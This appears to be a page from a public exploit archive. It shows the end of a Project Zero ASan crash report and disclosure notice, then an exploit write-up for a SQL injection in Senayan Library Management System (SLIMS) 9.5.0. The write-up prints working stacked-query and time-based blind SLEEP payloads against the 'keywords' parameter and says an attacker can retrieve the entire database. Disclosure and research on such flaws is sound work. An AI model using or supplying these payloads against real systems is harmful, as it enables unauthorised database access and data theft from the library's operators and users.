f5<br /> Stack use after scope: f8<br /> Global redzone: f9<br /> Global init order: f6<br /> Poisoned by user: f7<br /> Container overflow: fc<br /> Array cookie: ac<br /> Intra object redzone: bb<br /> ASan internal: fe<br /> Left alloca redzone: ca<br /> Right alloca redzone: cb<br /> Shadow gap: cc<br />==46529==ABORTING<br /><br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. **The scheduled deadline is 2022-12-01**. For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html<br /><br /><br /><br /><br /><br />Found by: maddi...@google.com<br /><br /></code></pre>
<pre><code>## Title: Senayan Library Management System v9.5.0 a.k.a SLIMS 9 BULIAN SQLi<br />## Author: nu11secur1ty<br />## Date: 11.03.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0<br /><br />## Description:<br />The `keywords` parameter appears to be vulnerable to SQL injection attacks.<br />A single quote was submitted in the keywords parameter, and a general<br />error message was returned.<br />Two single quotes were then submitted and the error message<br />disappeared. The injection is confirmed manually from nu11secur1ty.<br />The attacker can retrieve all information from the database of this<br />system, by using this vulnerability.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payload:<br /><br />```MySQL<br />---<br />Parameter: keywords (GET)<br /> Type: stacked queries<br /> Title: MySQL >= 5.0.12 stacked queries (comment)<br /> Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECT<br />SLEEP(5)#<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)<br /> Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')))<br />RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)#<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/63og5v)<br /><br />## Time spent<br />`3:00`<br /><br /></code></pre>
Archives
Categories
- All Exploits 4105
- Remote Code Execution
- SQL Injection
- Command Injection
- Local File Inclusion
- Cross Site Scripting
- Privilege Escalation
- Denial Of Service
- Authentication Bypass
- Buffer Overflow